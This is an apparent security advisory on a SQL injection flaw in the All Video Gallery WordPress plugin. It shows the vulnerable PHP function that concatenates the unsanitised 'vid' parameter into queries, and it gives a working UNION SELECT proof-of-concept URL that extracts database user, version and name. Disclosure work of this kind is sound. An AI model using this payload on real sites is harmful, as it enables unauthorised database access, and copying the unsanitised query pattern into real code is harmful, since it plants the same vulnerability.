Advisory
Analysis of vulnerability
The All Video Gallery Plugin has two pages, playlist.php and /xml/playlist.php, which both takes a “vid” ID and outputs the result from the query into XML format.
|
35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 |
function buildNodes() { global $wpdb; $video = $wpdb->get_row("SELECT * FROM " . $wpdb->prefix . "allvideogallery_videos WHERE id=" . $_GET['vid']); $items = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "allvideogallery_videos WHERE category='" . $video->category . "' AND id!=" . $_GET['vid']); $node = ''; for ($i = 0, $n = count($items); $i < $n; $i++) { $item = $items[$i]; $node .= '<item>'."\n"; $node .= '<thumb>'.$item->thumb.'</thumb>'."\n"; $node .= '<title>'.$item->title.'</title>'."\n"; $node .= '<link>'.@add_query_arg( "slg", $item->slug, $_GET['page'] ).'</link>'."\n"; $node .= '</item>'."\n"; } return $node; } |
Note however that the “vid” GET parameter is never sanitized, which means that we can inject SQL into it and disclose information from the database by making a simple request to either of the pages like this:
|
1 |
http://192.168.80.130/wordpress/wp-content/plugins/all-video-gallery/xml/playlist.php?vid=2 UNION SELECT 1, 2, user(), @@version, 5, 6, 7, 8, 9, 10, database(), 12, 13, 14, 15, 16, 17, 18 |